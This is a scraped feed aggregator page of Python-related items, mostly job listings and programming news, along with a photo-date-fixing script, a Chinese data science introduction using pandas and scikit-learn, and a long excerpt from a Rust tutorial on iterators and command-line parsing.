Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to make strategic...
From Zillow Group - Thu, 01 Nov 2018 11:21:13 GMT - View all Seattle, WA jobs
          17.8.1979: Monty Python's "Das Leben des Brian" hat Premiere      Cache   Translate Page      
none
          Programador Back-end Django / Python – 1 Vaga RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5be1d49b0a4181469d2bef38 emprego.net – onde candidatos e Leia mais...
          Ultimate Programmer Super Stack Bundle      Cache   Translate Page      

I'm pleased to share that my PHP 7 Upgrade Guide ebook has been featured in the Ultimate Programmer Super Stack bundle! This is a hand-curated collection of 25+ premium ecourses, bestselling ebooks, and bonus resources that will help new programmers:

  • Learn a wide range of today’s most popular (and lucrative) languages and frameworks, including everything from Python, JavaScript, and Ruby, to HTML, CSS, and Kotlin, and more…
  • Discover how to build APIs, websites, and iOS and Android applications from scratch
  • Uncover the 'Business of Software' (how computer programs work, how computer programmers think, and how to start your very own computer programming business)
  • Master the soft skills you need to become 'Coder Complete' (this stuff will have a huge impact on your career, believe me)

And much more.

Typically, you’d have to spend over $600+ to get your hands on everything packed inside this Stack… But this week, you can get everything for over 95% off.

Not only does it include my ebook, but it also includes things like Phil's Sturgeon's “Build APIs You Won't Hate” book (retail value: $26.99) and Spencer Carli's "Production Ready React Native" e-course (retail value: $67.00). You can check out the full list of courses, ebooks, and resources here.

While I'm not interested in spamming you with irrelevant ads, as a reader of my blog I do think you'd find this bundle to be a great value, and some of the proceeds go towards supporting my open-source work in the community, so I think it's a win-win!

Claim this deal before it runs out!


          基于RxJava+Retrofit2+Glide+ButterKnife的MVP模式漫画app源码      Cache   Translate Page      
项目项目基于RxJava+Retrofit2+Glide+ButterKnife,结合MVP模式开发API由本人编写的Python项目提供,暂不提供源代码本项目纯属学习交流使用,数据由非正常路径获得,不得用于商业用途技术点使用RxJava配合Retrofit做网络请求整个项目使用MVP架构,对应model,view,presen ...
          Java架构师学习路线图,第6点尤为重要!      Cache   Translate Page      
Web应用,最常见的研发语言是Java和PHP。后端服务,最常见的研发语言是Java和C/C++。大数据,最常见的研发语言是Java和Python。可以说,Java是现阶段中国互联网公司中,覆盖度最广的研发语言,掌握了Java技术体系,不管在成熟的大公司,快速发展的公司,还是创业阶段的 ...
          23种Pandas核心操作,你需要过一遍吗?      Cache   Translate Page      
Pandas是一个Python软件库,它提供了大量能使我们快速便捷地处理数据的函数和方法。一般而言,Pandas是使Python成为强大而高效的数据分析环境的重要因素之一。在本文中,作者从基本数据集读写、数据处理和DataFrame操作三个角度展示了23个Pandas核心方法。Pandas是基于N ...
          today's howtos      Cache   Translate Page      

          finish my Cloud Scrapper / Upload Tool      Cache   Translate Page      
I am looking for someone who finishes my tool. It scans my cloud account and writes the data into a database. To get the data from these accounts offline. Without using the Website. Part of the program is already finished and should now be finished... (Budget: $30 - $250 USD, Jobs: API, Python, SQLite, Web Scraping)
          用 Python 修正相片日期      Cache   Translate Page      

上星期參加了 WTIA 舉辦的「2018 北台灣物聯網投資合作商機考察參訪團」。帶了相機及手機拍攝活動相片。回到香港,才發現相機在 8 月到名古屋時調快了一小時,於是編寫以下 Python 程式,讀取相片中的 EXIF 資料,把所有 Canon 拍攝的相片日期都調慢一小時,變回正確時間。
##----------------------------------------------------------------------------------------
## Fix Photo Creation Date
##----------------------------------------------------------------------------------------
## Platform: macOS Mojave + Python 2.7
## Copyrights Pacess Studio, 2018. All rights reserved.
##----------------------------------------------------------------------------------------

import os
import time
import exifread

##----------------------------------------------------------------------------------------
## Global variables
_path = "./"

##----------------------------------------------------------------------------------------
## Get files from directory
for root, dirs, files in os.walk(_path):

   for file in files:
   
      if file.startswith("."):
         continue

      if not file.endswith(".JPG"):
         continue

      print("\nProcessing "+file+"...", end="")

      ##----------------------------------------------------------------------------------------
      ## Get EXIF
      handle = open(_path+file, "rb")
      tags = exifread.process_file(handle)
   
      machine = str(tags["Image Make"])
      print(machine, end="")

      ## Process only if "Canon"
      if "Canon" not in machine:
         continue

      ##----------------------------------------------------------------------------------------
      ## Subtract one hour
      #datetime = os.path.getmtime(file)
      #timeString = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(datetime))
      timeString = str(tags["Image DateTime"])
      datetime = time.mktime(time.strptime(timeString, "%Y:%m:%d %H:%M:%S"))

      newDatetime = datetime-(60*60)
      newTimeString = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(newDatetime))
      
      os.utime(_path+file, (newDatetime, newDatetime))
      print(" ("+timeString+" => GMT:"+newTimeString+")", end="")

print("\nDone\n")

          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or Labview o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o DFM
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or LabView o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o Des
          The complete JavaScript handbook      Cache   Translate Page      
JavaScript is one of the most popular programming languages in the world, and is now widely used also outside of the browser. The rise of Node.js in the last few years unlocked back-end development – once the domain of Java, Ruby, Python, PHP, and more traditional server-side languages.
          Software Engineer - BackEnd - Fetchr - Dubai      Cache   Translate Page      
Extensive experience programming in Python, Java, Go, Scala and/or C, C++. Participate in all aspects of developing and designing new and innovative...
From Akhtaboot - Mon, 15 Oct 2018 10:31:43 GMT - View all Dubai jobs
          Senior Software Engineer - Fetchr - Dubai      Cache   Translate Page      
Extensive experience programming in Python, Java, Go, Scala and/or C, C++. Design and develop software and algorithms to solve business problems and challenges...
From Akhtaboot - Mon, 15 Oct 2018 10:31:47 GMT - View all Dubai jobs
          OEB-656 - [V-991] Programador Junior Python/Django - Zona Capital Federal en Buenos Aires C.F. (ML.029) en Buenos Aires C.F      Cache   Translate Page      
Buenos Aires - Importante empresa dedicada a la importación, comercializaron y distribución de equipos de seguridad electrónica, redes y comunicaciones... de CLARKISTAS MUJERES EXCLUYENTE para sumar a sus equipos de trabajo. Principales tareas: -Carga y descarga [...] 06 nov | Complement Group (holding...
          Desenvolvedor Python – 1 Vaga – Rio de Janeiro – RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5be03e4f0a4181469d2bb1ac emprego.net – onde candidatos e Leia mais...
          awscli (1.16.48)      Cache   Translate Page      
The AWS CLI is an open source tool built on top of the AWS SDK for Python (Boto) that provides commands for interacting with AWS services.

          Python Developer      Cache   Translate Page      
PA-Philadelphia, Job Title: Python Developer Location: Philadelphia, PA Duration: Either Contract or Contract To Hire or Full Time Description: As a Python Developer, you will be a part of a team of developers delivering in an Agile environment. Responsible for utilizing best practices in order to ensure high quality software solutions. The ideal candidate for this job should have strong experience in PYTHON devel
          Electrical Engineer/Systems Engineer - Kroenke Sports Enterprises - Fort Worth, TX      Cache   Translate Page      
Computer languages, supporting several microcontroller languages including (machine code, Arduino, .NET, ATMEL, Python, PASCAL, C++, Ladder, Function Block)....
From Kroenke Sports Enterprises - Sat, 13 Oct 2018 18:16:18 GMT - View all Fort Worth, TX jobs
          Python 数据科学入门      Cache   Translate Page      

不需要昂贵的工具即可领略数据科学的力量,从这些开源工具起步即可。

无论你是一个具有数学或计算机科学背景的资深数据科学爱好者,还是一个其它领域的专家,数据科学提供的可能性都在你力所能及的范围内,而且你不需要昂贵的,高度专业化的企业级软件。本文中讨论的开源工具就是你入门时所需的全部内容。

Python,其机器学习和数据科学库(pandasKerasTensorFlowscikit-learnSciPyNumPy 等),以及大量可视化库(MatplotlibpyplotPlotly 等)对于初学者和专家来说都是优秀的自由及开源软件工具。它们易于学习,很受欢迎且受到社区支持,并拥有为数据科学而开发的最新技术和算法。它们是你在开始学习时可以获得的最佳工具集之一。

许多 Python 库都是建立在彼此之上的(称为依赖项),其基础是 NumPy 库。NumPy 专门为数据科学设计,经常被用于在其 ndarray 数据类型中存储数据集的相关部分。ndarray 是一种方便的数据类型,用于将关系表中的记录存储为 cvs 文件或其它任何格式,反之亦然。将 scikit 函数应用于多维数组时,它特别方便。SQL 非常适合查询数据库,但是对于执行复杂和资源密集型的数据科学操作,在 ndarray 中存储数据可以提高效率和速度(但请确保在处理大量数据集时有足够的 RAM)。当你使用 pandas 进行知识提取和分析时,pandas 中的 DataFrame 数据类型和 NumPy 中的 ndarray 之间的无缝转换分别为提取和计算密集型操作创建了一个强大的组合。

作为快速演示,让我们启动 Python shell 并在 pandas DataFrame 变量中加载来自巴尔的摩的犯罪统计数据的开放数据集,并查看加载的一部分 DataFrame:

>>>  import pandas as pd
>>>  crime_stats = pd.read_csv('BPD_Arrests.csv')
>>>  crime_stats.head()

我们现在可以在这个 pandas DataFrame 上执行大多数查询,就像我们可以在数据库中使用 SQL 一样。例如,要获取 Description 属性的所有唯一值,SQL 查询是:

$ SELECT unique(“Description”) from crime_stats;

利用 pandas DataFrame 编写相同的查询如下所示:

>>>  crime_stats['Description'].unique()
['COMMON   ASSAULT'   'LARCENY'   'ROBBERY   - STREET'   'AGG.   ASSAULT'
'LARCENY   FROM   AUTO'   'HOMICIDE'   'BURGLARY'   'AUTO   THEFT'
'ROBBERY   - RESIDENCE'   'ROBBERY   - COMMERCIAL'   'ROBBERY   - CARJACKING'
'ASSAULT   BY  THREAT'   'SHOOTING'   'RAPE'   'ARSON']

它返回的是一个 NumPy 数组(ndarray 类型):

>>>  type(crime_stats['Description'].unique())
<class   'numpy.ndarray'>

接下来让我们将这些数据输入神经网络,看看它能多准确地预测使用的武器类型,给出的数据包括犯罪事件,犯罪类型以及发生的地点:

>>>  from   sklearn.neural_network   import   MLPClassifier
>>>  import   numpy   as np
>>>
>>>  prediction   =  crime_stats[[‘Weapon’]]
>>>  predictors   =  crime_stats['CrimeTime',   ‘CrimeCode’,   ‘Neighborhood’]
>>>
>>>  nn_model   =  MLPClassifier(solver='lbfgs',   alpha=1e-5,   hidden_layer_sizes=(5,
2),   random_state=1)
>>>
>>>predict_weapon   =  nn_model.fit(prediction,   predictors)

现在学习模型准备就绪,我们可以执行一些测试来确定其质量和可靠性。对于初学者,让我们输入一个训练集数据(用于训练模型的原始数据集的一部分,不包括在创建模型中):

>>>  predict_weapon.predict(training_set_weapons)
array([4,   4,   4,   ..., 0,   4,   4])

如你所见,它返回一个列表,每个数字预测训练集中每个记录的武器。我们之所以看到的是数字而不是武器名称,是因为大多数分类算法都是用数字优化的。对于分类数据,有一些技术可以将属性转换为数字表示。在这种情况下,使用的技术是标签编码,使用 sklearn 预处理库中的 LabelEncoder 函数:preprocessing.LabelEncoder()。它能够对一个数据和其对应的数值表示来进行变换和逆变换。在这个例子中,我们可以使用 LabelEncoder()inverse_transform 函数来查看武器 0 和 4 是什么:

>>>  preprocessing.LabelEncoder().inverse_transform(encoded_weapons)
array(['HANDS',   'FIREARM',   'HANDS',   ..., 'FIREARM',   'FIREARM',   'FIREARM']

这很有趣,但为了了解这个模型的准确程度,我们将几个分数计算为百分比:

>>>  nn_model.score(X,   y)
0.81999999999999995

这表明我们的神经网络模型准确度约为 82%。这个结果似乎令人印象深刻,但用于不同的犯罪数据集时,检查其有效性非常重要。还有其它测试来做这个,如相关性、混淆、矩阵等。尽管我们的模型有很高的准确率,但它对于一般犯罪数据集并不是非常有用,因为这个特定数据集具有不成比例的行数,其列出 FIREARM 作为使用的武器。除非重新训练,否则我们的分类器最有可能预测 FIREARM,即使输入数据集有不同的分布。

在对数据进行分类之前清洗数据并删除异常值和畸形数据非常重要。预处理越好,我们的见解准确性就越高。此外,为模型或分类器提供过多数据(通常超过 90%)以获得更高的准确度是一个坏主意,因为它看起来准确但由于过度拟合而无效。

Jupyter notebooks 相对于命令行来说是一个很好的交互式替代品。虽然 CLI 对于大多数事情都很好,但是当你想要运行代码片段以生成可视化时,Jupyter 会很出色。它比终端更好地格式化数据。

这篇文章 列出了一些最好的机器学习免费资源,但是还有很多其它的指导和教程。根据你的兴趣和爱好,你还会发现许多开放数据集可供使用。作为起点,由 Kaggle 维护的数据集,以及在州政府网站上提供的数据集是极好的资源。


via: https://opensource.com/article/18/3/getting-started-data-science

作者:Payal Singh 译者:MjSeven 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Eclipse Advanced Scripting Environment (EASE)      Cache   Translate Page      
Date Updated: 
Tue, 2018-11-06 08:59
Eclipse.org
Date Created: 
Mon, 2018-11-05 10:15

EASE is a scripting environment for Eclipse.

It allows to create, maintain and execute script code in the context of the running Eclipse instance. Therefore such scripts may manipulate and extend the IDE itself. Loadable script modules allow to simplify usage of native Java objects and can be extended with application specific methods.

Scripts may not only automate UI tasks, they can also be integrated into toolbars and menus dynamically. This allows to customize the IDE with pure script code.

Various script engines are available, like Rhino (JavaScript), Jython/Py4J (Python) or Groovy. The extensible framework allows to add any kind of language, you could even embed your own command shell.


          Programming News      Cache   Translate Page      
  • Open Source Survey Shows Python Love, Security Pain Points

    ActiveState published results of a survey conducted to examine challenges faced by developers who work with open source runtimes, revealing love for Python and security pain points.

  • Study Finds Lukewarm Corporate Engagement With Open Source

    Companies expect developers to use open source tools at work, but few make substantial contributions in return

    Developers say that nearly three-quarters of their employers expect them to use open source software to do their jobs, but that those same companies’ contribution to the open source world is relatively low, with only 25 percent contributing more than $1,000 (£768) a year to open source projects.

    Only a small number of employers, 18 percent, contribute to open source foundations, and only 34 percent allow developers to use company time to make open source contributions, according to a new study.

    The study follows IBM’s announcement last week that it plans to buy Linux maker Red Hat for $34 billion (£26m) in order to revitalise its growth in the cloud market, an indication of the importance of open source in the booming cloud industry.

    The report by cloud technology provider DigitalOcean, based on responses from more than 4,300 developers around the world, is the company’s fifth quarterly study on developer trends, with this edition focusing entirely on open source.

  • On learning Go and a comparison with Rust

    I spoke at the AKL Rust Meetup last month (slides) about my side project doing data mining in Rust. There were a number of engineers from Movio there who use Go, and I've been keen for a while to learn Go and compare it with Rust and Python for my data mining side projects, so that inspired me to knuckle down and learn Go.

    Go is super simple. I was able to learn the important points in a couple of evenings by reading GoByExample, and I very quickly had an implementation of the FPGrowth algorithm in Go up and running. For reference, I also have implementations of FPGrowth in Rust, Python, Java and C++.

  • anytime 0.3.2

    A new minor release of the anytime package arrived on CRAN this morning. This is the thirteenth release, and the first since July as the package has gotten feature-complete.

    anytime is a very focused package aiming to do just one thing really well: to convert anything in integer, numeric, character, factor, ordered, … format to either POSIXct or Date objects – and to do so without requiring a format string. See the anytime page, or the GitHub README.md for a few examples.

read more


          Delivery Project Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
7+ years Application Development Proficiency in one or more general purpose programming languages – Python, Java, and PL/SQL Relational data modeling using...
From Mphasis - Tue, 06 Nov 2018 12:28:43 GMT - View all Bengaluru, Karnataka jobs
          Delv Senior Software Eng - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
5+ years Application Development Proficiency in one or more general purpose programming languages – Python , Java, and PL/SQL Relational data modeling using...
From Mphasis - Tue, 06 Nov 2018 12:28:41 GMT - View all Bengaluru, Karnataka jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experts Engaged in Delivering Their Best - This is the cornerstone of...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Geospatial Technical Principal - State of Wyoming - Cheyenne, WY      Cache   Translate Page      
Demonstrated skills in design of custom geospatial solutions, including use of the ArcGIS JavaScript API, Python and other appropriate resources.... $19.93 - $24.91 an hour
From State of Wyoming - Tue, 25 Sep 2018 02:50:28 GMT - View all Cheyenne, WY jobs
          Waf - The meta build system      Cache   Translate Page      
Waf is a Python-based framework for configuring, compiling and installing applications.

          Integrations Specialist - OnShift, Inc - Cleveland, OH      Cache   Translate Page      
Experience with Microsoft Server and Task Scheduler a plus. Advanced trouble shooting using SQL, Python, and advanced Excel is highly desired....
From OnShift, Inc - Thu, 20 Sep 2018 16:25:59 GMT - View all Cleveland, OH jobs
          SNR. PYTHON DEVELOPER- DEVELOP YOUR MACHINE LEARNING AND DATA ANALYTICS SKILLS      Cache   Translate Page      
Acuity Consultants - Paarl, Western Cape - This is an excellent opportunity for a SNR. PYTHON DEVELOPER to develop their machine learning and data analytics skills. Based in the... has pioneered the InsureTech space in South Africa, by capitalizing on data science and machine learning technology to create the country's first award...
          PYTHON DEVELOPER- DEVELOP YOUR MACHINE LEARNING AND DATA ANALYTICS SKILLS      Cache   Translate Page      
Acuity Consultants - Paarl, Western Cape - This is an excellent opportunity for a Python developer to develop their machine learning and data analytics skills. Based in the NORTHERN... has pioneered the InsureTech space in South Africa, by capitalizing on data science and machine learning technology to create the country's first award...
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
| Mercury, Segue, Borland. This specialization is usually performed by senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          Developer Needed for creating a responsive WordPress Website/application - Upwork      Cache   Translate Page      
Loooking for a PRO developer who create an autopilot website for me in which peoples. it's mostly Likely tool like YEXT, Brighlocal or tribelocal.com.

if you visit the following website: https://app.tribelocal.com

Email to signin: shopusn at protonmail.com
Password: Local123

Once you log in successfully you, Look at the whole dashboard carefully and let me know if you can create a 100% exactly website like for me. Also, Please bid your price without any hesitation. the major thing I really need a website like that.

Good luck!

Budget: $500
Posted On: November 07, 2018 06:38 UTC
ID: 214651065
Category: Web, Mobile & Software Dev > Web Development
Skills: Automated Call Distribution, Ecrion Software EOS, Fision, Grovo Learning, Merrill DataSite, Octane Render, PostCSS, Python Pandas, Sales Strategy, Union Square Software
Country: Pakistan
click to apply
          Machine Learning Engineer - Stefanini - McLean, VA      Cache   Translate Page      
AWS, Spark, Scala, Python, Airflow, EMR, Redshift, Athena, Snowflake, ECS, DevOps Automation, Integration, Docker, Build and Deployment Tools Ability to provide...
From Indeed - Tue, 16 Oct 2018 20:59:09 GMT - View all McLean, VA jobs
          24 Oracle Linux Updates      Cache   Translate Page      
The following updates has been released for Oracle Linux: ELBA-2018-3339 Oracle Linux 7 libvirt bug fix update ELSA-2018-3032 Low: Oracle Linux 7 binutils security, bug fix, and enhancement update ELSA-2018-3041 Moderate: Oracle Linux 7 python security and bug fix update ELSA-2018-3050 Moderate: Oracle Linux 7 gnutls security, bug fix, and enhancement update ELSA-2018-3052 Moderate: Oracle Linux 7 wget security and bug fix update ELSA-2018-3056 Moderate: Oracle Linux 7 samba security, bug fix, and enhancement update ELSA-2018-3065 Mode...
          Michael Snoyman: Iterators and Errors - Rust Crash Course lesson 3      Cache   Translate Page      

Last time, we finished off with a bouncy ball implementation with some downsides: lackluster error handling and ugly buffering. It also had another limitation: a static frame size. Today, we’re going to address all of these problems, starting with that last one: let’s get some command line arguments to control the frame size.

This post is part of a series based on teaching Rust at FP Complete. If you’re reading this post outside of the blog, you can find links to all posts in the series at the top of the introduction post. You can also subscribe to the RSS feed.

Like last time, I’m going to expect you, the reader, to be making changes to the source code along with me. Make sure to actually type in the code while reading!

Command line arguments

We’re going to modify our application as follows:

  • Accept two command line arguments: the width and the height
  • Both must be valid u32s
  • Too many or too few command line arguments will result in an error message

Sounds easy enough. In a real application, we would use a proper argument-handling library, like clap. But for now, we’re going lower level. Like we did for the sleep function, let’s start by searching the standard library docs for the word args. The first two entries both look relevant.

  • std::env::Args An iterator over the arguments of a process, yielding a String value for each argument.
  • std::env::args Returns the arguments which this program was started with (normally passed via the command line).

Now’s a good time to mention that, by strong convention:

  • Module names (like std and env) and function names (like args) are snake_cased
  • Types (like Args) are PascalCased
    • Exception: primitives like u32 and str are lower case

The std module has an env module. The env module has both an Args type and a args function. Why do we need both? Even more strangely, let’s look at the type signature for the args function:

pub fn args() -> Args

The args function returns a value of type Args. If Args was a type synonym for, say, a vector of Strings, this would make sense. But that’s not the case. And if you check out its docs, there aren’t any fields or methods exposed on Args, only trait implementations!

The extra datatype pattern

Maybe there’s a proper term for this in Rust, but I haven’t seen it myself yet. (If someone has, please let me know so I can use the proper term.) There’s a pervasive pattern in the Rust ecosystem, which in my experience starts with iterators and continues to more advanced topics like futures and async I/O.

  • We want to have composable interfaces
  • We also want high performance
  • Therefore, we define lots of helper data types that allow the compiler to perform some great optimizations
  • And we define traits as an interface to let these types compose nicely with each other

Sound abstract? Don’t worry, we’ll make that concrete in a bit. Here’s the practical outcome of all of this:

  • We end up programming quite a bit against traits, which provide a common abstractions and lots of helper functions
  • We get a matching data type for many common functions
  • Often times, our type signatures will end up being massive, representing all of the different composition we performed (though the new-ish -> impl Iterator style helps with that significantly, see the announcement blog post for more details)

Alright, with that out of the way, let’s get back to command line arguments!

CLI args via iterators

Let’s play around in an empty file before coming back to bouncy. (Either use cargo new and cargo run, or use rustc directly, your call.) If I click on the expand button next to the Iterator trait on the Args docs page, I see this function:

fn next(&mut self) -> Option<String>

Let’s play with that a bit:

use std::env::args;

fn main() {
    let mut args = args(); // Yes, that name shadowing works
    println!("{:?}", args.next());
    println!("{:?}", args.next());
    println!("{:?}", args.next());
    println!("{:?}", args.next());
}

Notice that we had to use let mut, since the next method will mutate the value. Now I’m going to run this with cargo run foo bar:

$ cargo run foo bar
   Compiling args v0.1.0 (/Users/michael/Desktop/tmp/args)
    Finished dev [unoptimized + debuginfo] target(s) in 1.60s
     Running `target/debug/args foo bar`
Some("target/debug/args")
Some("foo")
Some("bar")
None

Nice! It gives us the name of our executable, followed by the command line arguments, returning None when there’s nothing left. (For pedants out there: command line arguments aren’t technically required to have the command name as the first argument, it’s just a really strong convention most tools follow.)

Let’s play with this some more. Can you write a loop that prints out all of the command line arguments and then exits? Take a minute, and then I’ll provide some answers.

Alright, done? Cool, let’s see some examples! First, we’ll loop with return.

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        match args.next() {
            None => return,
            Some(arg) => println!("{}", arg),
        }
    }
}

We also don’t need to use return here. Instead of returning from the function, we can just break out of the loop:

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        match args.next() {
            None => break,
            Some(arg) => println!("{}", arg),
        }
    }
}

Or, if you want to save on some indentation, you can use the if let.

use std::env::args;

fn main() {
    let mut args = args();
    loop {
        if let Some(arg) = args.next() {
            println!("{}", arg);
        } else {
            break;
            // return would work too, but break is nicer
            // here, as it is more narrowly scoped
        }
    }
}

You can also use while let. Try to guess what that would look like before checking the next example:

use std::env::args;

fn main() {
    let mut args = args();
    while let Some(arg) = args.next() {
        println!("{}", arg);
    }
}

Getting better! Alright, one final example:

use std::env::args;

fn main() {
    for arg in args() {
        println!("{}", arg);
    }
}

Whoa, what?!? Welcome to one of my favorite aspects of Rust. Iterators are a concept built into the language directly, via for loops. A for loop will automate the calling of next(). It also hides away the fact that there’s some mutable state at play, at least to some extent. This is a powerful concept, and allows a lot of code to end up with a more functional style, something I happen to be a big fan of.

Skipping

It’s all well and good that the first arguments in the name of the executable. But we typically don’t care about that. Can we somehow skip that in our output? Well, here’s one approach:

use std::env::args;

fn main() {
    let mut args = args();
    let _ = args.next(); // drop it on the floor
    for arg in args {
        println!("{}", arg);
    }
}

That works, but it’s a bit clumsy, especially compared to our previous version that had no mutable variables. Maybe there’s some other way to skip things. Let’s search the standard library again. I see the first results as std::iter::Skip and std::iter::Iterator::skip. The former is a data type, and the latter is a method on the Iterator trait. Since our Args type implements the Iterator trait, we can use it. Nice!

Side note Haskellers: skip is like drop in most Haskell libraries, like Data.List or vector. drop has a totally different meaning in Rust (dropping owned data), so skip is a better name in Rust.

Let’s look at some signatures from the docs above:

pub struct Skip<I> { /* fields omitted */ }
fn skip(self, n: usize) -> Skip<Self>

Hmm… deep breaths. Skip is a data type that is parameterized over some data type, I. This is a common pattern in iterators: Skip wraps around an existing data type and adds some new functionality to how it iterates. The skip method will consume an existing iterator, take the number of arguments to skip, and return a new Skip<OrigDataType> value. How do I know it consumes the original iterator? The first parameter is self, not &self or &mut self.

That seemed like a lot of concepts. Fortunately, usage is pretty easy:

use std::env::args;

fn main() {
    for arg in args().skip(1) {
        println!("{}", arg);
    }
}

Nice!

Exercise 1 Type inference lets the program above work just fine without any type annotations. However, it’s a good idea to get used to the generated types, since you’ll see them all too often in error messages. Get the program below to compile by fixing the type signature. Try to do it without using compiler at first, since the error messages will almost give the answer away.

use std::env::{args, Args};
use std::iter::Skip;

fn main() {
    let args: Args = args().skip(1);
    for arg in args {
        println!("{}", arg);
    }
}

This layering-of-datatypes approach, as mentioned above, is a real boon to performance. Iterator-heavy code will often compile down to an efficient loop, comparable with the best hand-rolled loop you could have written. However, iterator code is much higher level, more declarative, and easy to maintain and extend.

There’s a lot more to iterators, but we’re going to stop there for the moment, since we still want to process our command line parameters, and we need to learn one more thing first.

Parsing integers

If you search the standard library for parse, you’ll find the str::parse method. The documentation does a good job of explaining things, I won’t repeat that here. Please go read that now.

OK, you’re back? Turbofish is a funny name, right?

Take a crack at writing a program that prints the result of parsing each command line argument as a u32, then check my version:

fn main() {
    for arg in std::env::args().skip(1) {
        println!("{:?}", arg.parse::<u32>());
    }
}

And let’s try running it:

$ cargo run one 2 three four 5 6 7
Err(ParseIntError { kind: InvalidDigit })
Ok(2)
Err(ParseIntError { kind: InvalidDigit })
Err(ParseIntError { kind: InvalidDigit })
Ok(5)
Ok(6)
Ok(7)

When the parse is successful, we get the Ok variant of the Result enum. When the parse fails, we get the Err variant, with a ParseIntError telling us what went wrong. (The type signature on parse itself uses some associated types to indicate this type, we’re not going to get into that right now.)

This is a common pattern in Rust. Rust has no runtime exceptions, so we track potential failure at the type level with actual values.

Side note You may think of panics as similar to runtime exceptions, and to some extent they are. However, you’re not able to properly recover from panics, making them different in practice from how runtime exceptions are used in other languages like Python.

Parse our command line

We’re finally ready to get started on our actual command line parsing! We’re going to be overly tedious in our implementation, especially with our data types. After we finish implementing this in a blank file, we’ll move the code into the bouncy implementation itself. First, let’s define a data type to hold a successful parse, which will contain the width and the height.

Challenge Will this be a struct or an enum? Can you try implementing this yourself first?

Since we want to hold onto multiple values, we’ll be using a struct. I’d like to use named fields, so we have:

struct Frame {
    width: u32,
    height: u32,
}

Next, let’s define an error type to represent all of the things that can go wrong during this parse. We have:

  • Too few arguments
  • Too many arguments
  • Invalid integer

Challenge Are we going to use a struct or an enum this time?

This time, we’ll use an enum, because we’ll only detect one of these problems (whichever we notice first). Officianados of web forms and applicative parsing may scoff at this and say we should detect all errors, but we’re going to be lazy.

enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

Notice that the InvalidInteger variant takes a payload, the String it failed parsing. This is what makes enums in Rust so much more powerful than enumerations in most other languages.

Challenge We’re going to write a parse_args helper function. Can you guess what its type signature will be?

Combining all of the knowledge we established above, here’s an implementation:

#[derive(Debug)]
struct Frame {
    width: u32,
    height: u32,
}

#[derive(Debug)]
enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

fn parse_args() -> Result<Frame, ParseError> {
    use self::ParseError::*; // bring variants into our namespace

    let mut args = std::env::args().skip(1);

    match args.next() {
        None => Err(TooFewArgs),
        Some(width_str) => {
            match args.next() {
                None => Err(TooFewArgs),
                Some(height_str) => {
                    match args.next() {
                        Some(_) => Err(TooManyArgs),
                        None => {
                            match width_str.parse() {
                                Err(_) => Err(InvalidInteger(width_str)),
                                Ok(width) => {
                                    match height_str.parse() {
                                        Err(_) => Err(InvalidInteger(height_str)),
                                        Ok(height) => Ok(Frame {
                                            width,
                                            height,
                                        }),
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

fn main() {
    println!("{:?}", parse_args());
}

Holy nested blocks Batman, that is a lot of indentation! The pattern is pretty straightforward:

  • Pattern match
  • If we got something bad, stop with an Err
  • If we got something good, keep going

Haskellers at this point are screaming about do notation and monads. Ignore them. We’re in the land of Rust, we don’t take kindly to those things around here. (Someone please yell at me for that terrible pun.)

Exercise 2 Why didn’t we need to use the turbofish on the call to parse above?

What we want to do is return early from our function. You know what keyword can help with that? That’s right: return!

fn parse_args() -> Result<Frame, ParseError> {
    use self::ParseError::*;

    let mut args = std::env::args().skip(1);

    let width_str = match args.next() {
        None => return Err(TooFewArgs),
        Some(width_str) => width_str,
    };

    let height_str = match args.next() {
        None => return Err(TooFewArgs),
        Some(height_str) => height_str,
    };

    match args.next() {
        Some(_) => return Err(TooManyArgs),
        None => (),
    }

    let width = match width_str.parse() {
        Err(_) => return Err(InvalidInteger(width_str)),
        Ok(width) => width,
    };

    let height = match height_str.parse() {
        Err(_) => return Err(InvalidInteger(height_str)),
        Ok(height) => height,
    };

    Ok(Frame {
        width,
        height,
    })
}

Much nicer to look at! However, it’s still a bit repetitive, and littering those returns everywhere is subjectively not very nice. In fact, while typing this up, I accidentally left off a few of the returns and got to stare at some long error messages. (Try that for yourself.)

Question mark

Side note The trailing question mark we’re about to introduce used to be the try! macro in Rust. If you’re confused about the seeming overlap: it’s simply a transition to new syntax.

The pattern above is so common that Rust has built in syntax for it. If you put a question mark after an expression, it basically does the whole match/return-on-Err thing for you. It’s more powerful than we’ll demonstrate right now, but we’ll get to that extra power a bit later.

